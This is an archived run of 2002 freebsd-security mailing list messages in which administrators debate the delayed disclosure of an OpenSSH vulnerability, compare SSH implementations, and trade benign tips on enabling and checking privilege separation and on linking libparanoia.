text/plain; charset=us-ascii Date: Tue, 25 Jun 2002 16:59:04 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org avalon@coombs.anu.edu.au said: > This *is* what they claim to do. Just because it's what they claim it doesn't mean you have to believe them. > Personally, I think their claims are unrealistic and all the hype > about "software audit" is just that - hype. If the OpenSSH team are > working with ISS on a fix then it seems to me that ISS found this > problem, not the OpenSSH team. Why did the audit by the OpenSSH team > miss this problem ? Isn't this what their code audits are meant to > find - security bugs ? What benefit are we *really* getting from > their "code audits" ? One would have thought that was a reasonable goal in performing an audit on a security product. However, if the exploit is based on semantic rather than syntactic errors, then it may have snuck through the audit. As a legal friend of mine says when someone asks for free advice "this will be worth exactly what you pay for it..." I apply the same grain of salt to free software. I had the option of performing my own code audit on OpenSSH. I chose not to. I understand that a lot of people are unhappy at the state of play. Here's a perfect opportunity to choose a different path. Show your displeasure by not using the software. Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0: 2:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from kilgore.blindfaith.org (adsl-64-163-155-3.dsl.snfc21.pacbell.net [64.163.155.3]) by hub.freebsd.org (Postfix) with ESMTP id A496137BA9A for ; Tue, 25 Jun 2002 00:00:18 -0700 (PDT) Received: from kilgore.blindfaith.org (localhost.blindfaith.org [127.0.0.1]) by kilgore.blindfaith.org (8.12.2/8.12.2) with ESMTP id g5P70FAE026821; Tue, 25 Jun 2002 00:00:15 -0700 (PDT) (envelope-from blyon@blindfaith.org) Received: from localhost (blyon@localhost) by kilgore.blindfaith.org (8.12.2/8.12.2/Submit) with ESMTP id g5P70FKn026818; Tue, 25 Jun 2002 00:00:15 -0700 (PDT) (envelope-from blyon@blindfaith.org) X-Authentication-Warning: kilgore.blindfaith.org: blyon owned process doing -bs Date: Tue, 25 Jun 2002 00:00:15 -0700 (PDT) From: Ben Lyon To: Michael Sharp Cc: behanna@zbzoom.net, freebsd-security@FreeBSD.ORG Subject: RE: libparanoia In-Reply-To: <2002.66.56.232.240.1024968758.squirrel@webmail.probsd.ws> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org From the GCC manpage: The directories searched include several standard system directories plus any that you specify with `-L'. Normally the files found this way are library files--archive files whose members are object files. The linker handles an archive file by scan- ning through it for members which define symbols that have so far been referenced but not defined. However, if the linker finds an ordinary object file rather than a library, the object file is linked in the usual fashion. The only difference between using an `-l' option and specifying a file name is that `-l' surrounds library with `lib' and `.a' and searches several directories. hence either order should work, as well as: -L/usr/local/lib/libparanoia.so --Ben -------------------------------------------------------------------- Ben Lyon blyon@blindfaith.org (415)286-0896 On Mon, 24 Jun 2002, Michael Sharp wrote: > Thx Chris, yea, I see now that it is backwards, but thats how the author > had it documented. I'll compile apache now with the LDFLAGS argument and > run ldd `which httpd` to see if it build libparanoia in. If not, I guess I > could use apxs to install the libparanoia object file. > > Again, thx > michael > > Chris BeHanna said: > > On Mon, 24 Jun 2002, Michael Sharp wrote: > > > >> So, if I install libparanoia.. I would then add to any Makefile's > >> CFLAGS arguments -lparanoia -L/usr/local/lib ? > > > > That looks backwards. "-L/usr/local/lib -lparanoia" looks more > > sensible. > > > >> Example: /usr/ports/www/apache13/Makefile > >> > >> change: CFLAGS+= -O6 -fomit-frame-pointer > >> > >> to: CFLAGS+= -O6 -fomit-frame-pointer -lparanoia > >> -L/usr/local/lib > >> > >> and apache13 would be built using /usr/local/lib/libparanoia.so ? > > > > No. You want to alter LDFLAGS, not CFLAGS. > > > > At some point in the not-too-distant past (i.e., around the time > > of the publication of the zlib double-free bug), the merits and > > caveats of using libparanoia were discussed. I suggest you search the > > list archives. > > > > -- > > Chris BeHanna > > Software Engineer (Remove "bogus" before responding.) > > behanna@bogus.zbzoom.net > > Turning coffee into software since 1990. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0: 4:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 688A837BAAF for ; Tue, 25 Jun 2002 00:00:57 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id BAA13889; Tue, 25 Jun 2002 01:00:47 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625005950.00d70ad0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 01:00:45 -0600 To: Jan Lentfer , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? In-Reply-To: <1024987600.2078.10.camel@jan-linnb.lan> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:46 AM 6/25/2002, Jan Lentfer wrote: >Hi all, > >i replaced the base OpenSSH with 3.3p from the ports typing: > > bash-2.05# make -DOPENSSH_OVERWRITE_BASE > bash-2.05# make -DOPENSSH_OVERWRITE_BASE install > >I then added "sshd_program=/usr/local/sbin/sshd" to /etc/rc.conf If you overwrite the base install, you SHOULDN'T try to run it out of /usr/local/sbin, because it ought to be placed in /usr/sbin (which is where the base install put it). --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0: 6:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from karhu.wmhost.com (karhu.wmhost.com [195.255.103.130]) by hub.freebsd.org (Postfix) with ESMTP id 135C337BAC7 for ; Tue, 25 Jun 2002 00:01:05 -0700 (PDT) Received: from duron950 (ws131.wmhost.com [195.255.103.131]) by karhu.wmhost.com (Postfix) with SMTP id EE79F22F2F for ; Tue, 25 Jun 2002 10:06:51 +0300 (EEST) Message-ID: <004701c21c16$19054830$8367ffc3@duron950> From: "Toni Walther" To: Subject: unsubscribe freebsd-security Date: Tue, 25 Jun 2002 10:01:15 +0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0044_01C21C2F.3E3EAA10" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0044_01C21C2F.3E3EAA10 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable unsubscribe freebsd-security=20 ------=_NextPart_000_0044_01C21C2F.3E3EAA10 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

unsubscribe freebsd-security=20

------=_NextPart_000_0044_01C21C2F.3E3EAA10-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:10:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by hub.freebsd.org (Postfix) with ESMTP id D19E137BB86 for ; Tue, 25 Jun 2002 00:06:32 -0700 (PDT) Received: from [80.129.115.197] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17MkPH-0008NT-00; Tue, 25 Jun 2002 09:06:31 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 470672DE; Tue, 25 Jun 2002 09:06:28 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id E2EEDDD; Tue, 25 Jun 2002 09:06:24 +0200 (CEST) Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? From: Jan Lentfer To: Brett Glass Cc: FreeBSD Security Maillinglist In-Reply-To: <4.3.2.7.2.20020625005950.00d70ad0@localhost> References: <4.3.2.7.2.20020625005950.00d70ad0@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 09:05:29 +0200 Message-Id: <1024988729.2078.15.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Die, 2002-06-25 um 09.00 schrieb Brett Glass: > If you overwrite the base install, you SHOULDN'T try to run it > out of /usr/local/sbin, because it ought to be placed in > /usr/sbin (which is where the base install put it). Thanks, I think I screwed up somehow :(. I now have sshd in /usr/sbin AND in /usr/local/sbin, both report Version 3.3. Is there an easy way to clean up or can I just remove sshd from /usr/local/sbin Thanks again, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:13:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from boleskine.patpro.net (boleskine.patpro.net [62.4.20.155]) by hub.freebsd.org (Postfix) with ESMTP id CAA6F37BC5F for ; Tue, 25 Jun 2002 00:12:25 -0700 (PDT) Received: from localhost (cassandre [192.168.0.1]) by boleskine.patpro.net (8.11.3/8.11.3) with ESMTP id g5P7CSY46109; Tue, 25 Jun 2002 09:12:29 +0200 (CEST) (envelope-from patpro@patpro.net) Date: Tue, 25 Jun 2002 09:12:23 +0200 Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: freebsd-security@FreeBSD.ORG To: Jan Lentfer From: patpro In-Reply-To: <1024987600.2078.10.camel@jan-linnb.lan> Message-Id: Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On mardi, juin 25, 2002, at 08:46 , Jan Lentfer wrote: > Finally I added "UsePrivilegeSeparation yes" to /etc/ssh/sshd_config and > SIGHUPed sshd. sshd -V no reports version 3.3. > > Am I set and done? Is there a way to check if Privilege Seperation > really works ? just log in (via ssh of course) and type : $ ps -aux | grep sshd | grep -v grep and make sure it gives something like this : root 178 0.0 1.3 2088 1180 ?? Is 4:40PM 0:00.20 /usr/local/sbin/ sshd root 61294 0.0 1.8 4868 1656 ?? I 8:21AM 0:00.05 sshd: patpro [priv] (sshd) patpro 61296 0.0 1.9 5000 1744 ?? S 8:21AM 0:00.14 sshd: patpro@ ttyp0 (sshd) first process : regular sshd daemon, second : spawned root limited process, third : active process with limited privileges. (spawned from the 2nd process if I understand correctly) patpro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:16: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from angmar.mel.vet.com.au (angmar.mel.vet.com.au [203.39.245.7]) by hub.freebsd.org (Postfix) with ESMTP id D009437BCCB for ; Tue, 25 Jun 2002 00:15:28 -0700 (PDT) Received: from nargothrond.ca.com (nargothrond.ca.com [155.35.178.10]) by angmar.mel.vet.com.au (Postfix) with ESMTP id 1CB9614F303 for ; Tue, 25 Jun 2002 17:15:18 +1000 (EST) Received: from ca.com ([155.35.178.101]) by nargothrond.ca.com with esmtp; Tue, 25 Jun 2002 17:14:42 +1000 Message-ID: <3D181884.2040200@ca.com> Date: Tue, 25 Jun 2002 17:15:16 +1000 From: Lachlan O'Dea Organization: Computer Associates User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Theo de Raadt Cc: FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) References: <200206250156.g5P1upLJ029822@cvs.openbsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Theo de Raadt wrote: > Jason Stone wrote: > >>Release now and let the community help you fix the bug (since >>apparently it's so complicated that you can't fix it right away on your >>own...). > > > It took about 3 minutes for the first rev. So you are saying that you already have a patch that fixes the vulnerability? If so, it seems to me that delaying the release does more harm than good. There is one disadvantage to publicly releasing either the patch or the details of the vulnerability now: the black hats could use the information to develop an exploit before people have a chance to protect themselves. However, there are a number of advantages to releasing all the information now: 1) Many OpenSSH users (perhaps the majority) are not in a position to upgrade to version 3.3. The UsePrivilegeSeparation feature is not available to them. 2) For users, installing a patched version of their vendor's current OpenSSH version is the most straightforward solution. Certainly quicker and less painful than trying to jump to 3.3. 3) It is far easier for vendors to patch the version of OpenSSH they currently ship than it is to rush out an upgrade to version 3.3 (at least I think that is the case, I can't be sure since I don't know anything about the vulnerability). As you noted in your announcement, version 3.3 has problems on some platforms. It also sounds like vendors must perform non-trivial work to get UsePrivilegeSeparation to work. From what you said above, it sounds like the fix for the vulnerability is fairly simple. Perhaps the FreeBSD security team could have already committed the fix if they knew what it was. 4) In your announcement, you did not indicate which versions of OpenSSH are vulnerable. You seem to be saying that we should assume they are all vulnerable. People may spend significant effort upgrading to version 3.3 and losing the features that don't work on their platorm, only to later discover that they weren't vulnerable in the first place. 5) Everyone's situation is different. Individual administrators may be able to protect their own systems through other means (perhaps quicker and easier) than upgrading to version 3.3. However, without any information about the vulnerability, they are helpless. In my opinion, the advantages of immediate disclosure outweigh the disadvantages. You have a different opinion, and yours is the one that counts in this case. We are all entitled to our opinion, right? If the fix is a relatively simple one, as I think you are indicating, it seems that vendors could patch their shipping versions of OpenSSH faster than an exploit could be developed. As things stand now, we have a whole bunch of people unable to move to 3.3 who are in the dark and very worried. > Apparently you have a comprehension difficulty. I urge you to go back > and re-read what I posted to lots of lists. Perhaps some other people > can help you. Apparently I share Jason's comprehension difficulty. Please note that I'm not complaining about a poor response from the OpenSSH developers or anything like that. You all do great work. I'm just saying that, in my opinion, you would do much more good than harm if you released everything you know about this vulnerability now. -- Lachlan O'Dea Computer Associates Pty Ltd Webmaster Vet - Anti-Virus Software http://www.vet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:19:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id BF1F937B400 for ; Tue, 25 Jun 2002 00:19:24 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id BAA14063; Tue, 25 Jun 2002 01:19:09 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625011811.00d74230@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 01:19:07 -0600 To: Darren Reed , security@FreeBSD.ORG From: Brett Glass Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: <200206250632.QAA02400@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:32 AM 6/25/2002, Darren Reed wrote: >What do others think about creating a little "bio-diversity" and >moving from OpenSSH to FreeSSH at some point in the future as the >"default" ssh installed ? Methinks you're picking on Theo because you're still peeved by the ipf/pf flap. Diversity is always good, but SSH, Inc. fills that role pretty well. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:29:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by hub.freebsd.org (Postfix) with ESMTP id E76EA37B40A for ; Tue, 25 Jun 2002 00:27:42 -0700 (PDT) Received: from [217.82.32.109] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17Mkjl-0002rt-00; Tue, 25 Jun 2002 09:27:41 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id BFE1A1D1; Tue, 25 Jun 2002 09:27:31 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 7FAF3DD; Tue, 25 Jun 2002 09:27:28 +0200 (CEST) Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? From: Jan Lentfer To: patpro Cc: FreeBSD Security Maillinglist In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 09:26:33 +0200 Message-Id: <1024989993.2078.20.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Die, 2002-06-25 um 09.12 schrieb patpro: > just log in (via ssh of course) and type : > > $ ps -aux | grep sshd | grep -v grep > > and make sure it gives something like this : > > root 178 0.0 1.3 2088 1180 ?? Is 4:40PM 0:00.20 /usr/local/sbin/ > sshd > root 61294 0.0 1.8 4868 1656 ?? I 8:21AM 0:00.05 sshd: patpro > [priv] (sshd) > patpro 61296 0.0 1.9 5000 1744 ?? S 8:21AM 0:00.14 sshd: patpro@ > ttyp0 (sshd) > > > first process : regular sshd daemon, > second : spawned root limited process, > third : active process with limited privileges. (spawned from the 2nd > process if I understand correctly) Thanks a lot, I guess I have it working then, since I see the same on my box now. Maybe I am on the safe side now for longer than 2 weeks :-). I have Diploma exams in a few weeks - it seems like exploits always WAIT to come out when I REALLY don't have time :-) Thanks again, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:34:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 42C5337B4EC for ; Tue, 25 Jun 2002 00:32:51 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id RAA16661; Tue, 25 Jun 2002 17:32:46 +1000 (EST) From: Darren Reed Message-Id: <200206250732.RAA16661@caligula.anu.edu.au> Subject: Re: Time to look put more resources into FreeSSH ? To: brett@lariat.org (Brett Glass) Date: Tue, 25 Jun 2002 17:32:45 +1000 (Australia/ACT) Cc: security@FreeBSD.ORG In-Reply-To: <4.3.2.7.2.20020625011811.00d74230@localhost> from "Brett Glass" at Jun 25, 2002 01:19:07 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Brett Glass, sie said: > > At 12:32 AM 6/25/2002, Darren Reed wrote: > > >What do others think about creating a little "bio-diversity" and > >moving from OpenSSH to FreeSSH at some point in the future as the > >"default" ssh installed ? > [...stupid & irrelevant remark deleted...] > > Diversity is always good, but SSH, Inc. fills > that role pretty well. Except that SSH Inc's product is not suitable for those who want to use a "free" ssh in a commercial environment. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:36:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns2.austclear.com.au (ns2.austclear.com.au [192.43.185.70]) by hub.freebsd.org (Postfix) with ESMTP id E7E5337B649 for ; Tue, 25 Jun 2002 00:35:45 -0700 (PDT) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.166.65]) by ns2.austclear.com.au (8.11.2/8.11.3) with ESMTP id g5P7Zit27295; Tue, 25 Jun 2002 17:35:45 +1000 (EST) (envelope-from ahl@austclear.com.au) Received: from tungsten (tungsten [192.168.166.65]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id RAA10379; Tue, 25 Jun 2002 17:35:43 +1000 (EST) Message-Id: <200206250735.RAA10379@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: Darren Reed Cc: security@FreeBSD.ORG Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: Message from Darren Reed of "Tue, 25 Jun 2002 16:32:49 +1000." <200206250632.QAA02400@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 25 Jun 2002 17:35:43 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org avalon@coombs.anu.edu.au said: > What do others think about creating a little "bio-diversity" and > moving from OpenSSH to FreeSSH at some point in the future as the > "default" ssh installed ? And that's another excellent suggestion for those that are unhappy with the direction that OpenSSH is taking. Don't get me wrong--I don't think OpenSSH (the software) is a perfect fit for my needs (I actually liked the information I got from FascistLogging to track what certain people were doing on our production servers). I've never bothered with the "political" side of the project. I don't have the time or motivation to do it myself, so I'm not going to complain that somebody has provided me with something I can use for free that pretty much meets my needs. If FreSSH picks up steam and fills my needs better, I'll be happy to change. Conversely, if someone wants to pay me exorbitant sums to develop an SSH package from scratch I'll happily do that too :-) Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:39:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id B3C8637B409 for ; Tue, 25 Jun 2002 00:38:45 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5P7ci3x069061; Tue, 25 Jun 2002 19:38:44 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Tue, 25 Jun 2002 19:38:44 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Workarounds for OpenSSH problems In-Reply-To: <4.3.2.7.2.20020625000559.00dcb2c0@localhost> Message-ID: <20020625181310.M58819-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Brett Glass wrote: > At 12:02 AM 6/25/2002, Andrew McNaughton wrote: > > >I've installed it. It griped and wouldn't start without `mkdir > >/var/empty`. Having added that it's running, but it hasn't griped about > >the lack of an 'sshd' user/group. I added them anyway. I don't see any > >sign of an sshd process running as anything other than root though. > >Compression is enabled when I connect, but I'm not sure that the privilege > >separation is actually working. > > I'd be inclined to think it wasn't. Did you make with -D OPENSSH_OVERWRITE_BASE > so that it overwrote the old implementation? (You might still be running the > old one.) No, looks like it's operational. It did complain about /var/empty being missing, and on inspection, there's plenty of other evidence. The machine in question is on the other side of the world. I rely on ssh to administer it and losing access would be a serious pain. I therefore make a practice of installing new ssh version with PREFIX specified, and run the new version on a different port while the old one is still operational. I then disable the old version, and start up a backup sshd of the new version. I'm fairly familiar with this process, and I'm very sure of which executable and configuration I'm using. Still, I verified it with lsof just now. definitely the right executable, but nothing connected to /var/empty after I've logged in through it. In the output of lastcomm I can see that there was a process owned by sshd which lasted for 0.05 seconds during authentication. I turned on lots of debugging, and there's plenty of other indications of the privilege separation. This includes messages like: Jun 25 19:12:10 a2 sshd[68320]: debug1: monitor_child_preauth: andrew has been authenticated by privileged process 68320 is the pid of the process which survives, and runs as root. I don't see any syslog entries from the unpriviledged process. So, I don't entirely understand the partitioning of responsibility, and am somewhat surprised that it's the root process which persists. I'm left somewhat uncertain of what has been bought by the split. However, it looks like its enabled, including compression. I did see one odd bug: When I started the server up with -D -d -d -d, the message "debug3: channel_close_fds: channel 0: r -1 w -1 e -1" came through on the client rather than the server. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:47:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id 62BF437B400 for ; Tue, 25 Jun 2002 00:47:44 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 318F9AE03F; Tue, 25 Jun 2002 00:47:44 -0700 (PDT) Date: Tue, 25 Jun 2002 00:47:44 -0700 From: Alfred Perlstein To: Lachlan O'Dea Cc: Theo de Raadt , FreeBSD Security Subject: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020625074744.GK53232@elvis.mu.org> References: <200206250156.g5P1upLJ029822@cvs.openbsd.org> <3D181884.2040200@ca.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D181884.2040200@ca.com> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Lachlan O'Dea [020625 00:18] wrote: > Theo de Raadt wrote: > > > Jason Stone wrote: > > > >>Release now and let the community help you fix the bug (since > >>apparently it's so complicated that you can't fix it right away on your > >>own...). > > > > > >It took about 3 minutes for the first rev. > > So you are saying that you already have a patch that fixes the > vulnerability? If so, it seems to me that delaying the release does more > harm than good. *sigh* People don't get that what Theo is doing is very fair. He's giving everyone a chance to protect themselves, the only people that are getting screwed are those that are too damn lazy to adapt the 'priv' stuff to their OS. Quit your whining and submit patches to update your favorite version of FreeBSD already! thanks, -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0:53:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 7F25C37B419 for ; Tue, 25 Jun 2002 00:52:02 -0700 (PDT) Received: (qmail 11581 invoked by uid 1000); 25 Jun 2002 07:51:56 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2002 07:51:56 -0000 Date: Tue, 25 Jun 2002 00:51:56 -0700 (PDT) From: Jason Stone X-X-Sender: To: Darren Reed Cc: Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: <200206250632.QAA02400@caligula.anu.edu.au> Message-ID: <20020625004019.W5916-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > What do others think about creating a little "bio-diversity" and > moving from OpenSSH to FreeSSH at some point in the future as the > "default" ssh installed ? I'm very much in favor of "biodiversity," but if you're talking about FreSSH (fressh.org), then, as far as I'm aware, it's a) only v1, and b) pretty dead. Personally, I'm exploring the feasibility of non-ssh alternatives (ssl-wrapped versions of telnet/rsh/etc, enterprise-wide ipsec and telnet/rsh/etc, etc...). Does anyone have any other ideas along these lines? But yeah, definitely biodiversity. ssh has embraced and extended rsh to the point where people depend on all 